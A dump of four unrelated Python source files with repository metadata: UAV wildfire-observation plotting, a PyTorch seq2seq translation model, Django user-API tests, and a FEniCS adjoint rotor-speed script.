# gdd.axis.set_xticks(np.arange(area[0][0]-25, area[0][1], 22.22))
# gdd.axis.set_yticks(np.arange(area[1][0]-25, area[1][1], 22.22))
# gdd.axis.grid(True)
gdd.axes.tick_params(
axis='both', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom='off', # ticks along the bottom edge are off
left='off', # ticks along the bottom edge are off
top='off', # ticks along the top edge are off
labelleft='off', # ticks along the bottom edge are off
labelbottom='off') # labels along the bottom edge are off
gdd.axes.set_xlabel("")
gdd.axes.set_ylabel("")
t_range_fire = (0, np.inf)
gdd.draw_ignition_contour(geodata=fire1, time_range=t_range_fire, cmap=matplotlib.cm.plasma)
gdd.draw_ignition_shade(with_colorbar=False, geodata=fire1, vmin=0, vmax=120*60, cmap=matplotlib.cm.Reds)
gdd.legend()
return gdd
def detail_case_figure(wind_speed=5., wind_dir=0.) -> "fire_rs.geodata.display.GeoDataDisplay":
"""Plot a case with an small fire
we can make a zoom and observe a dubinswind path and observed cells."""
# Geographic environment (elevation, landcover, wind...)
wind = (wind_speed, wind_dir)
wind_xy = (wind[0] * np.cos(wind[1]), wind[0] * np.sin(wind[1]))
area = ((480000.0, 485000.0), (6210000.0, 6215000.0))
env = PlanningEnvironment(area, wind_speed=10, wind_dir=wind[1],
planning_elevation_mode='flat', flat_altitude=0)
# Fire applied to the previous environment
ignition_points = [
TimedPoint(area[0][0] + 2000.0, area[1][0] + 2000.0, 0),
]
logging.info("Start of propagation")
fire = propagation.propagate_from_points(env, ignition_points, 180 * 60)
logging.info("End of propagation")
# Configure some flight
base_wp = Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.)
start_t = 120 * 60
uav = UAVConf.x8()
f_confs = [
FlightConf(uav, start_t, Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.), None,
wind_xy),
]
conf = SAOP_conf(start_t, start_t + uav.max_flight_time)
fire1 = fire.ignitions()
pl = Planner(env, fire1, f_confs, conf)
pl.compute_plan()
sr_1 = pl.search_result
fmapper = FireMapper(env, fire1)
gdd = fire_rs.geodata.display.GeoDataDisplay.pyplot_figure(env.raster.combine(fire1),
frame=(0, 0))
gdd.add_extension(TrajectoryDisplayExtension, (None,), {})
gdd.axes.grid(True)
# Draw expected fire contour
t_range = (sr_1.final_plan().trajectories()[0].start_time(0) - 120,
sr_1.final_plan().trajectories()[0].end_time(len(
sr_1.final_plan().trajectories()[0]) - 1) + 120)
t_range_fire = (0, np.inf)
gdd.draw_ignition_contour(geodata=fire1, time_range=t_range_fire, cmap=matplotlib.cm.Reds)
# Draw observed fire
executed_path_1 = sr_1.final_plan().trajectories()[0].sampled_with_time(step_size=10)
fmapper.observe(executed_path_1, pl.flights[0].uav)
gdd.TrajectoryDisplayExtension.draw_observation_map(obs_map=fmapper.observed, layer='ignition',
color='gray')
gdd.TrajectoryDisplayExtension.draw_observation_map(obs_map=fmapper.firemap, layer='ignition',
color='green')
# Draw trajectory
colors = ['blue', 'green', 'magenta']
labels = ["UAV " + str(i) for i in range(len(f_confs))]
for i in range(len(f_confs)):
plot_plan_trajectories(sr_1.final_plan(), gdd, trajectories=i, draw_path=True,
draw_segments=False, draw_flighttime_path=False, colors=[colors[i]],
labels=None)
gdd.legend()
return gdd
def singleuav_case_figure(wind_speed=5., wind_dir=0.,
uav_w_speed=None) -> "fire_rs.geodata.display.GeoDataDisplay":
"""Plot a case with wind, 1 UAV, 1 fire."""
# Geographic environment (elevation, landcover, wind...)
uav_w_speed = wind_speed if uav_w_speed is None else uav_w_speed
wind = (uav_w_speed, wind_dir)
wind_xy = (wind[0] * np.cos(wind[1]), wind[0] * np.sin(wind[1]))
area = ((480000.0, 485000.0), (6210000.0, 6215000.0))
env = PlanningEnvironment(area, wind_speed=wind[0] * 2, wind_dir=wind[1],
planning_elevation_mode='flat', flat_altitude=0)
# Fire applied to the previous environment
ignition_points = [
TimedPoint(area[0][0] + 2000.0, area[1][0] + 2000.0, 0),
]
logging.info("Start of propagation")
fire = propagation.propagate_from_points(env, ignition_points, 180 * 60)
logging.info("End of propagation")
# Configure some flight
base_wp = Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.)
start_t = 120 * 60
uav = UAVConf.x8()
f_confs = [
FlightConf(uav, start_t, Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.), None,
wind_xy),
]
conf = SAOP_conf(start_t, start_t + uav.max_flight_time)
fire1 = fire.ignitions()
pl = Planner(env, fire1, f_confs, conf)
pl.compute_plan()
sr_1 = pl.search_result
fmapper = FireMapper(env, fire1)
gdd = fire_rs.geodata.display.GeoDataDisplay.pyplot_figure(env.raster.combine(fire1),
frame=(0, 0))
gdd.add_extension(TrajectoryDisplayExtension, (None,), {})
# Draw expected fire contour
t_range = (sr_1.final_plan().trajectories()[0].start_time(0) - 120,
sr_1.final_plan().trajectories()[0].end_time(len(
sr_1.final_plan().trajectories()[0]) - 1) + 120)
t_range_fire = (0, np.inf)
gdd.draw_ignition_contour(geodata=fire1, time_range=t_range_fire, cmap=matplotlib.cm.Reds)
# Draw observed fire
executed_path_1 = sr_1.final_plan().trajectories()[0].sampled_with_time(step_size=10)
fmapper.observe(executed_path_1, pl.flights[0].uav)
gdd.draw_ignition_shade(geodata=fmapper.firemap, cmap=matplotlib.cm.summer, with_colorbar=False)
# Draw trajectory
colors = ['blue', 'green', 'magenta']
labels = ["UAV " + str(i) for i in range(len(f_confs))]
for i in range(len(f_confs)):
plot_plan_trajectories(sr_1.final_plan(), gdd, trajectories=i, draw_path=True,
draw_flighttime_path=False, colors=[colors[i]], labels=[labels[i]],
linestyles=['-'])
gdd.legend()
return gdd
def generic_case_figure(wind_speed=5.,
wind_dir=np.pi / 2) -> "fire_rs.geodata.display.GeoDataDisplay":
"""Plot a generic case with wind, multiple UAV from multiple bases, and multiple fire."""
# Geographic environment (elevation, landcover, wind...)
wind = (wind_speed, wind_dir)
area = ((480000.0, 485000.0), (6210000.0, 6215000.0))
env = PlanningEnvironment(area, wind_speed=wind[0], wind_dir=wind[1],
planning_elevation_mode='flat', flat_altitude=0)
# Fire applied to the previous environment
ignition_points = [
TimedPoint(area[0][0] + 1000.0, area[1][0] + 1000.0, 0.),
TimedPoint(area[0][0] + 4000.0, area[1][0] + 3000.0, 0.)
]
logging.info("Start of propagation")
fire = propagation.propagate_from_points(env, ignition_points, 120 * 60)
logging.info("End of propagation")
# Configure some flight
start_t = 90 * 60
uav = UAVConf.x8()
uav.max_flight_time/=5
f_confs = [
FlightConf(uav, start_t, Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.), None,
wind),
FlightConf(uav, start_t, Waypoint(area[0][1] - 100., area[1][0] + 1000., 0., 0.), None,
wind),
]
conf = SAOP_conf(start_t, start_t + uav.max_flight_time)
fire1 = fire.ignitions()
pl = Planner(env, fire1, f_confs, conf)
pl.compute_plan()
sr_1 = pl.search_result
fmapper = FireMapper(env, fire1)
gdd = fire_rs.geodata.display.GeoDataDisplay.pyplot_figure(env.raster.combine(fire1),
frame=(0, 0))
gdd.add_extension(TrajectoryDisplayExtension, (None,), {})
# Draw expected fire contour
t_range = (sr_1.final_plan().trajectories()[0].start_time(0) - 120,
sr_1.final_plan().trajectories()[0].end_time(len(
sr_1.final_plan().trajectories()[0]) - 1) + 120)
t_range_fire = (0, np.inf)
gdd.draw_ignition_contour(geodata=fire1, time_range=t_range_fire, cmap=matplotlib.cm.Reds)
# Draw observed fire
for i in range(len(f_confs)):
executed_path = sr_1.final_plan().trajectories()[i].sampled_with_time(step_size=10)
fmapper.observe(executed_path, pl.flights[i].uav)
gdd.draw_ignition_shade(geodata=fmapper.firemap, cmap=matplotlib.cm.summer,
vmin=t_range[0], vmax=t_range[1], with_colorbar=False)
# Draw trajectory
colors = ['blue', 'green', 'magenta']
labels = ["UAV " + str(i) for i in range(len(f_confs))]
for i in range(len(f_confs)):
plot_plan_trajectories(sr_1.final_plan(), gdd, trajectories=i, draw_path=True,
draw_flighttime_path=False, colors=[colors[i]], labels=[labels[i]],
linestyles=['-'])
gdd.legend()
return gdd
def threefire_twouav_figure(wind_speed=5.,
wind_dir=np.pi / 2) -> "fire_rs.geodata.display.GeoDataDisplay":
"""Plot a generic case with wind, multiple UAV from multiple bases, and multiple fire."""
# Geographic environment (elevation, landcover, wind...)
wind = (wind_speed, wind_dir)
area = ((480000.0, 485000.0), (6210000.0, 6215000.0))
env = PlanningEnvironment(area, wind_speed=wind[0], wind_dir=wind[1],
planning_elevation_mode='flat', flat_altitude=0)
# Fire applied to the previous environment
ignition_points = [
TimedPoint(area[0][0] + 1000.0, area[1][0] + 1000.0, 0.),
TimedPoint(area[0][0] + 4000.0, area[1][0] + 2000.0, 0.),
TimedPoint(area[0][0] + 2000.0, area[1][0] + 3500.0, 0.)
]
logging.info("Start of propagation")
fire = propagation.propagate_from_points(env, ignition_points, 120 * 60)
logging.info("End of propagation")
# Configure some flight
start_t = 90 * 60
uav = UAVConf.x8()
uav.max_flight_time /= 3
f_confs = [
FlightConf(uav, start_t, Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.), None,
wind),
FlightConf(uav, start_t, Waypoint(area[0][0] + 100., area[1][0] + 100., 0., 0.), None,
wind),
]
conf = SAOP_conf(start_t, start_t + uav.max_flight_time)
fire1 = fire.ignitions()
pl = Planner(env, fire1, f_confs, conf)
pl.compute_plan()
sr_1 = pl.search_result
fmapper = FireMapper(env, fire1)
gdd = fire_rs.geodata.display.GeoDataDisplay.pyplot_figure(env.raster.combine(fire1),
frame=(0, 0))
gdd.add_extension(TrajectoryDisplayExtension, (None,), {})
# Draw expected fire contour
t_range = (sr_1.final_plan().trajectories()[0].start_time(0),
sr_1.final_plan().trajectories()[0].end_time(len(
sr_1.final_plan().trajectories()[0]) - 1))
t_range_fire = (0, np.inf)
gdd.draw_ignition_contour(geodata=fire1, time_range=t_range_fire, cmap=matplotlib.cm.Reds,
alpha=1)
# Draw observed fire
for i in range(len(f_confs)):
executed_path = sr_1.final_plan().trajectories()[i].sampled_with_time(step_size=10)
fmapper.observe(executed_path, pl.flights[i].uav)
gdd.draw_ignition_shade(geodata=fmapper.firemap, cmap=matplotlib.cm.summer,
vmin=t_range[0], vmax=t_range[1], with_colorbar=False)
# Draw trajectory
colors = ['blue', 'darkgreen', 'magenta']
labels = ["UAV " + str(i) for i in range(len(f_confs))]
for i in range(len(f_confs)):
plot_plan_trajectories(sr_1.final_plan(), gdd, trajectories=i, draw_path=True,
draw_flighttime_path=False, colors=[colors[i]], labels=[labels[i]],
linestyles=['-'])
gdd.legend()
return gdd
def show(gdd, i):
gdd.figure.set_size_inches(6, 4.5)
gdd.figure.show()
def archive(gdd, i):
gdd.figure.set_size_inches(6, 4.5)
gdd.figure.savefig("result_" + str(i) + ".pdf", dpi=300, bbox_inches='tight')
gdd.figure.savefig("result_" + str(i) + ".eps", dpi=300, bbox_inches='tight')
gdd.figure.savefig("result_" + str(i) + ".svg", dpi=300, bbox_inches='tight')
if __name__ == '__main__':
# input("Press any key...")
matplotlib.rcParams['font.family'] = 'sans-serif'
matplotlib.rcParams['text.usetex'] = True
#
# f1 = singleuav_case_figure()
# show(f1, 1)
# archive(f1, 1)
#
f2 = generic_case_figure()
show(f2, 2 )
# archive(f2, 2)
#
# f3 = singleuav_case_figure(wind_speed=2., wind_dir=np.pi/2)
# archive(f3, 3)
#
# f4 = detail_case_figure()
# show(f4, 4)
# archive(f4, 4)
#
# f5 = wp_insertion()
# show(f5, "wp_insertion")
# archive(f5, "wp_insertion")
# f6 = twofire_threeuav_figure(wind_speed=2., wind_dir=np.pi/2)
# show(f6, "twofire_threeuav")
# archive(f6, "twofire_threeuav")
f7 = threefire_twouav_figure()
show(f7, "threefire_twouav")
archive(f7, "threefire_twouav")
print("eee")
| 39.93018
| 109
| 0.626939
|
420a219bef785cb6ad220b8079a251a612d00fbe
| 6,542
|
py
|
Python
|
seq2seqmodel.py
|
privateai-group1/SEAL
|
4422aee7c0b35a7048ce998e31f373755c099444
|
[
"MIT"
] | 3
|
2020-01-27T11:58:30.000Z
|
2022-02-14T14:57:43.000Z
|
seq2seqmodel.py
|
privateai-group1/SEAL
|
4422aee7c0b35a7048ce998e31f373755c099444
|
[
"MIT"
] | null | null | null |
seq2seqmodel.py
|
privateai-group1/SEAL
|
4422aee7c0b35a7048ce998e31f373755c099444
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.optim as optim
from torchtext.datasets import TranslationDataset, Multi30k
from torchtext.data import Field, BucketIterator
import spacy
import numpy as np
import random
import math
import time
spacy_de = spacy.load('de')
spacy_en = spacy.load('en')
def tokenize_de(text):
return [tok.text for tok in spacy_de.tokenizer(text)][::-1]
def tokenize_en(text):
return [tok.text for tok in spacy_en.tokenizer(text)]
SRC = Field(tokenize = tokenize_de,
init_token = '<sos>',
eos_token = '<eos>',
lower = True)
TRG = Field(tokenize = tokenize_en,
init_token = '<sos>',
eos_token = '<eos>',
lower = True)
from torchtext import datasets
train_data, valid_data, test_data = datasets.Multi30k.splits(exts=('.de', '.en'), fields=(SRC, TRG))
SRC.build_vocab(train_data, min_freq = 2)
TRG.build_vocab(train_data, min_freq = 2)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
BATCH_SIZE = 128
train_iterator, valid_iterator, test_iterator = BucketIterator.splits(
(train_data, valid_data, test_data),
batch_size = BATCH_SIZE,
device = device)
class Encoder(nn.Module):
def __init__(self, input_dim, emb_dim, hid_dim, n_layers, dropout):
super().__init__()
self.hid_dim = hid_dim
self.n_layers = n_layers
self.embedding = nn.Embedding(input_dim, emb_dim)
self.rnn = nn.LSTM(emb_dim, hid_dim, n_layers, dropout = dropout)
self.dropout = nn.Dropout(dropout)
def forward(self, src):
embedded = self.dropout(self.embedding(src))
outputs, (hidden, cell) = self.rnn(embedded)
return hidden, cell
class Decoder(nn.Module):
def __init__(self, output_dim, emb_dim, hid_dim, n_layers, dropout):
super().__init__()
self.output_dim = output_dim
self.hid_dim = hid_dim
self.n_layers = n_layers
self.embedding = nn.Embedding(output_dim, emb_dim)
self.rnn = nn.LSTM(emb_dim, hid_dim, n_layers, dropout = dropout)
self.fc_out = nn.Linear(hid_dim, output_dim)
self.dropout = nn.Dropout(dropout)
def forward(self, input, hidden, cell):
input = input.unsqueeze(0)
embedded = self.dropout(self.embedding(input))
output, (hidden, cell) = self.rnn(embedded, (hidden, cell))
prediction = self.fc_out(output.squeeze(0))
return prediction, hidden, cell
class Seq2Seq(nn.Module):
def __init__(self, encoder, decoder, device):
super().__init__()
self.encoder = encoder
self.decoder = decoder
self.device = device
def forward(self, src, trg, teacher_forcing_ratio = 0.5):
batch_size = trg.shape[1]
trg_len = trg.shape[0]
trg_vocab_size = self.decoder.output_dim
outputs = torch.zeros(trg_len, batch_size, trg_vocab_size).to(self.device)
hidden, cell = self.encoder(src)
input = trg[0,:]
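# the first decoder input is the <sos> token; at each later step the next input is either the
# ground-truth token (teacher forcing) or the decoder's own most likely prediction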
for t in range(1, trg_len):
output, hidden, cell = self.decoder(input, hidden, cell)
outputs[t] = output
teacher_force = random.random() < teacher_forcing_ratio
top1 = output.argmax(1)
input = trg[t] if teacher_force else top1
return outputs
INPUT_DIM = len(SRC.vocab)
OUTPUT_DIM = len(TRG.vocab)
ENC_EMB_DIM = 400
DEC_EMB_DIM = 400
HID_DIM = 400
N_LAYERS = 2
ENC_DROPOUT = 0.5
DEC_DROPOUT = 0.5
enc = Encoder(INPUT_DIM, ENC_EMB_DIM, HID_DIM, N_LAYERS, ENC_DROPOUT)
dec = Decoder(OUTPUT_DIM, DEC_EMB_DIM, HID_DIM, N_LAYERS, DEC_DROPOUT)
model = Seq2Seq(enc, dec, device).to(device)
def init_weights(m):
for name, param in m.named_parameters():
nn.init.uniform_(param.data, -0.08, 0.08)
model.apply(init_weights)
optimizer = optim.Adam(model.parameters())
TRG_PAD_IDX = TRG.vocab.stoi[TRG.pad_token]
criterion = nn.CrossEntropyLoss(ignore_index = TRG_PAD_IDX)
def train(model, iterator, optimizer, criterion, clip):
model.train()
epoch_loss = 0
for i, batch in enumerate(iterator):
src = batch.src
trg = batch.trg
optimizer.zero_grad()
output = model(src, trg)
output_dim = output.shape[-1]
output = output[1:].view(-1, output_dim)
trg = trg[1:].view(-1)
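# the [1:] slice drops the <sos> position so the loss is computed only over real target tokens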
loss = criterion(output, trg)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), clip)
optimizer.step()
epoch_loss += loss.item()
return epoch_loss / len(iterator)
def evaluate(model, iterator, criterion):
model.eval()
epoch_loss = 0
with torch.no_grad():
for i, batch in enumerate(iterator):
src = batch.src
trg = batch.trg
output = model(src, trg, 0) #turn off teacher forcing
output_dim = output.shape[-1]
output = output[1:].view(-1, output_dim)
trg = trg[1:].view(-1)
loss = criterion(output, trg)
epoch_loss += loss.item()
return epoch_loss / len(iterator)
N_EPOCHS = 10
CLIP = 1
best_valid_loss = float('inf')
for epoch in range(N_EPOCHS):
start_time = time.time()
train_loss = train(model, train_iterator, optimizer, criterion, CLIP)
valid_loss = evaluate(model, valid_iterator, criterion)
end_time = time.time()
if valid_loss < best_valid_loss:
best_valid_loss = valid_loss
print(f'\tTrain Loss: {train_loss:.3f} | Train PPL: {math.exp(train_loss):7.3f}')
print(f'\t Val. Loss: {valid_loss:.3f} | Val. PPL: {math.exp(valid_loss):7.3f}')
BATCH_SIZE = 10
_, _, test_it= BucketIterator.splits(
(train_data, valid_data, test_data),
batch_size = BATCH_SIZE,
device = device)
x = (next(iter(test_it)))
src = x.src
trg = x.trg
src_n = src.cpu().numpy()
trg_n = trg.cpu().numpy()
output = model(src, trg, 0)
preds = (output.max(2)[1]).cpu().numpy()
for o in range(10):
print('-------------------------------------------------')
print(' '.join([SRC.vocab.itos[o] for o in src_n[:,o] ]))
print(' '.join([TRG.vocab.itos[o] for o in trg_n[:,o] ]))
print(' '.join([TRG.vocab.itos[o] for o in preds[:,o] ]))
| 30.287037
| 100
| 0.606237
|
ca4f5c9f036a0f5fa3b0a338d8377d92c37d1b5f
| 5,721
|
py
|
Python
|
app/user/tests/test_user_api.py
|
zybex86/reicpe-app-api
|
3b4dbc93b7c1e97e1fba96da2c5f1e3534da030a
|
[
"MIT"
] | null | null | null |
app/user/tests/test_user_api.py
|
zybex86/reicpe-app-api
|
3b4dbc93b7c1e97e1fba96da2c5f1e3534da030a
|
[
"MIT"
] | null | null | null |
app/user/tests/test_user_api.py
|
zybex86/reicpe-app-api
|
3b4dbc93b7c1e97e1fba96da2c5f1e3534da030a
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
CREATE_USER_URL = reverse('user:create')
TOKEN_URL = reverse('user:token')
ME_URL = reverse('user:me')
def create_user(**params):
return get_user_model().objects.create_user(**params)
class PublicUserApiTests(TestCase):
""" Test the users API (public) """
def setUp(self):
self.client = APIClient()
def test_create_valid_user_success(self):
"""
Test creating user with valid payload is successful
"""
payload = {
'email': 'test@test.com',
'password': 'testtest',
'name': 'Test name'
}
response = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
user = get_user_model().objects.get(**response.data)
self.assertTrue(user.check_password(payload['password']))
self.assertNotIn('password', response.data)
def test_user_exists(self):
"""
Test creating a user that already exists fails
"""
payload = {
'email': 'test@test.pl',
'password': 'testing123'
}
create_user(**payload)
response = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_password_too_short(self):
"""
Test that the password must be more than 5 characters long
"""
payload = {
'email': 'test@testo.com',
'password': '123'
}
response = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
user_exists = get_user_model().objects.filter(
email=payload['email']
).exists()
self.assertFalse(user_exists)
def test_create_token_for_user(self):
""" Test that a token is created for the user """
payload = {'email': 'test@test.com', 'password': 'testpass'}
create_user(**payload)
response = self.client.post(TOKEN_URL, payload)
self.assertIn('token', response.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_create_token_invalid_credentials(self):
"""
Test that token is not created if invalid credentials are given
"""
create_user(email='test@test.com', password='testpass')
payload = {'email': 'test@test.com', 'password': 'wrong'}
response = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', response.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_no_user(self):
"""
Test that token is not created if user doesn't exist
"""
payload = {'email': 'test@test.com', 'password': 'wrong'}
response = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', response.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_missing_fields(self):
""" Test that email and password are required """
response = self.client.post(
TOKEN_URL,
{'email': 'one', 'password': ''}
)
self.assertNotIn('token', response.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
response = self.client.post(
TOKEN_URL,
{'email': '', 'password': 'wrong'}
)
self.assertNotIn('token', response.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
response = self.client.post(
TOKEN_URL,
{'email': '', 'password': ''}
)
self.assertNotIn('token', response.data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_user_unauthorised(self):
"""
Test that authentication is required for users
"""
response = self.client.get(ME_URL)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateUsersApiTests(TestCase):
""" Test API requests that require authentication """
def setUp(self):
self.user = create_user(
email='test@test.com',
password='password',
name='name'
)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_retrieve_profile_success(self):
"""
Test retrieving the profile for the logged in user
"""
response = self.client.get(ME_URL)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, {
'name': self.user.name,
'email': self.user.email
})
def test_post_me_not_allowed(self):
""" Test that POST is not allowed on the me url """
response = self.client.post(ME_URL)
self.assertEqual(
response.status_code,
status.HTTP_405_METHOD_NOT_ALLOWED
)
def test_update_user_profile(self):
"""
Test updating the user profile for authenticated user
"""
payload = {'name': 'new name', 'password': 'newpass'}
response = self.client.patch(ME_URL, payload)
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload['name'])
self.assertTrue(self.user.check_password(payload['password']))
self.assertEqual(response.status_code, status.HTTP_200_OK)
| 30.593583
| 76
| 0.626289
|
ba43791eb39934c6cbd95d2f65426b50044f8684
| 7,106
|
py
|
Python
|
tools/rotorspeed_v2.py
|
TUDelft-DataDrivenControl/FRED
|
f837f4a126e693519fa5ab7c913cb26570ca5278
|
[
"MIT"
] | null | null | null |
tools/rotorspeed_v2.py
|
TUDelft-DataDrivenControl/FRED
|
f837f4a126e693519fa5ab7c913cb26570ca5278
|
[
"MIT"
] | null | null | null |
tools/rotorspeed_v2.py
|
TUDelft-DataDrivenControl/FRED
|
f837f4a126e693519fa5ab7c913cb26570ca5278
|
[
"MIT"
] | null | null | null |
from fenics import *
from fenics_adjoint import *
import numpy as np
from pyadjoint import Block
from pyadjoint.overloaded_function import overload_function
import scipy.interpolate
def read_rosco_curves():
filename = "Cp_Ct_Cq.DTU10MW.txt"
with open(filename, "r") as f:
datafile = f.readlines()
for idx in range(len(datafile)):
if "Pitch angle" in datafile[idx]:
pitch_array = np.loadtxt(filename, skiprows=idx + 1, max_rows=1)
if "TSR vector" in datafile[idx]:
tsr_array = np.loadtxt(filename, skiprows=idx + 1, max_rows=1)
if "Wind speed" in datafile[idx]:
wind_speed = np.loadtxt(filename, skiprows=idx + 1, max_rows=1)
if "Power coefficient" in datafile[idx]:
cp_array = np.loadtxt(filename, skiprows=idx + 2, max_rows=len(tsr_array))
if "Thrust coefficient" in datafile[idx]:
ct_array = np.loadtxt(filename, skiprows=idx + 2, max_rows=len(tsr_array))
if "Torque coefficent" in datafile[idx]:
cq_array = np.loadtxt(filename, skiprows=idx + 2, max_rows=len(tsr_array))
pitch_grid, tsr_grid = np.meshgrid(pitch_array, tsr_array)
return pitch_grid, tsr_grid, ct_array, cp_array
def lookup_field(pitch_grid, tsr_grid, ct_array, cp_array):
# construct function space
sw_corner = Point(np.min(pitch_grid), np.min(tsr_grid))
ne_corner = Point(np.max(pitch_grid), np.max(tsr_grid))
(n_tsr, n_pitch) = pitch_grid.shape
# set function in function space
m = RectangleMesh(sw_corner, ne_corner, n_pitch + 1, n_tsr + 1)
fe = FiniteElement("Lagrange", m.ufl_cell(), 1)
fs = FunctionSpace(m, fe)
# assign values to function
dof_coords = fs.tabulate_dof_coordinates()
ct = Function(fs)
ct_interp = scipy.interpolate.interp2d(pitch_grid[0, :], tsr_grid[:, 0], ct_array, kind='linear')
ct_values = ct.vector().get_local()
cp = Function(fs)
cp_interp = scipy.interpolate.interp2d(pitch_grid[0, :], tsr_grid[:, 0], cp_array, kind='linear')
cp_values = cp.vector().get_local()
# logger.warning("Limiting 0<=ct<=1 for axial induction calculations")
for idx in range(len(dof_coords)):
pitch, tsr = dof_coords[idx]
ct_values[idx] = np.min((np.max((ct_interp(pitch, tsr), 0.)), 1.))
cp_values[idx] = np.min((np.max((cp_interp(pitch, tsr), 0.)), 1.))
a = 0.5 - 0.5 * (np.sqrt(1 - ct_values[idx]))
# convert to local
ct_values[idx] = ct_values[idx] / (1 - a)
cp_values[idx] = cp_values[idx] / (1 - a) ** 2
ct.vector().set_local(ct_values)
cp.vector().set_local(cp_values)
# write ct and cp field to output file for visual inspection
# ct_file = File("ct.pvd")
# cp_file = File("cp.pvd")
# ct_file.write(ct)
# cp_file.write(cp)
return ct, cp
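# Worked example of the rescaling above (numbers are illustrative, not taken from the ROSCO file):
# for a table value ct = 0.80 the axial induction factor is
#   a = 0.5 - 0.5*sqrt(1 - 0.80) ~= 0.2764,
# so the "local" thrust coefficient stored in the field is 0.80/(1 - a) ~= 1.106,
# and a table value cp = 0.45 becomes 0.45/(1 - a)**2 ~= 0.859.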
def get_coefficient(func, coord1, coord2, gradient=False, grad_idx=None):
return func(coord1, coord2)
backend_get_coefficient = get_coefficient
class CoefficientBlock(Block):
def __init__(self, func, coord1, coord2, **kwargs):
super(CoefficientBlock, self).__init__()
self.kwargs = kwargs
self.func = func
self.add_dependency(coord1)
self.add_dependency(coord2)
degree = func.function_space().ufl_element().degree()
family = func.function_space().ufl_element().family()
mesh = func.function_space().mesh()
if np.isin(family, ["CG", "Lagrange"]):
self.V = FunctionSpace(mesh, "DG", degree - 1)
else:
raise NotImplementedError(
"Not implemented for other elements than Lagrange")
def __str__(self):
return "CoefficientBlock"
def evaluate_adj_component(self, inputs, adj_inputs, block_variable, idx, prepared=None):
grad_idx = project(self.func.dx(idx), self.V)
return grad_idx(inputs[0], inputs[1]) * adj_inputs[0]
def recompute_component(self, inputs, block_variable, idx, prepared):
return backend_get_coefficient(self.func, inputs[0], inputs[1])
get_coefficient = overload_function(get_coefficient, CoefficientBlock)
# mesh = UnitSquareMesh(10, 10)
# V0 = FunctionSpace(mesh, "DG", 0)
# V1 = FunctionSpace(mesh, "Lagrange", 1)
#
# u = Function(V1)
# x = SpatialCoordinate(u)
# z = project(x[0]*x[1], V1)
pitch_grid, tsr_grid, ct_array, cp_array = read_rosco_curves()
ct, cp = lookup_field(pitch_grid, tsr_grid, ct_array, cp_array)
time_step = Constant(1.0)
inertia = Constant(5)
radius = Constant(90.)
pa = Constant(10.5)
wk0 = Constant(0.54)
q = Constant(1.2)
rotor_speed = Expression("(dt/J)*(pa/wk - q) + wk",
dt=time_step,
J=inertia,
pa=pa,
wk=wk0,
q=q,
degree=1)
rotor_speed_d_wk = Expression("-(dt/J)*(pa/(wk*wk)) + 1.",
dt=time_step,
J=inertia,
pa=pa,
wk=wk0,
q=q,
degree=1)
rotor_speed_d_pa = Expression("(dt/(J*wk))",
dt=time_step,
J=inertia,
# pa=pa,
wk=wk0,
# q=q,
degree=1)
rotor_speed_d_q = Expression("-(dt/J)",
dt=time_step,
J=inertia,
degree=1)
rotor_speed.dependencies = [wk0, pa, q]
rotor_speed.user_defined_derivatives = {wk0: rotor_speed_d_wk,
pa: rotor_speed_d_pa,
q: rotor_speed_d_q}
wind_speed = Constant(35.)
tip_speed_ratio = rotor_speed * radius / wind_speed
# new_rotor_speed = update_rotor_speed(pa, wk0, q)
print("define J")
# J = assemble(rotor_speed * dx(UnitIntervalMesh(1)))
# print("J: {:.3f}".format(float(J)))
print("define control")
b = Constant(np.random.rand())
controls = [wk0, pa, q, b]
# [c.assign(np.random.rand()) for c in controls]
# J = assemble(rotor_speed * dx(UnitIntervalMesh(1)))
# J = assemble(tip_speed_ratio**2 *dx(UnitIntervalMesh(1)))
tsr = assemble(tip_speed_ratio*dx(UnitIntervalMesh(1)))
ctp = get_coefficient(ct, b, tsr)
# J = assemble(ct**2 *dx(UnitIntervalMesh(1)))
print(assemble(rotor_speed*dx(UnitIntervalMesh(1))))
print(ctp)
print(tsr)
# wk0.assign(assemble(rotor_speed*dx(UnitIntervalMesh(1))))
# rotor_speed.wk.assign(assemble(rotor_speed*dx(UnitIntervalMesh(1))))
# pa.assign(Constant(np.random.rand()+5.))
wk0.assign(assemble(rotor_speed*dx(UnitIntervalMesh(1))))
tsr = assemble(tip_speed_ratio*dx(UnitIntervalMesh(1)))
ctpn = get_coefficient(ct, b, tsr)
print(assemble(rotor_speed*dx(UnitIntervalMesh(1))))
print(ctpn)
print(tsr)
J = ctpn**2
m = [Control(c) for c in controls]
h = [Constant(0.01 * np.random.rand()) for c in controls]
print("reduced functional")
Jh = ReducedFunctional(J, m)
print("taylor test")
taylor_test(Jh, controls, h)
# tape = get_working_tape()
# tape.visualise()
| 34.663415
| 101
| 0.621024
|
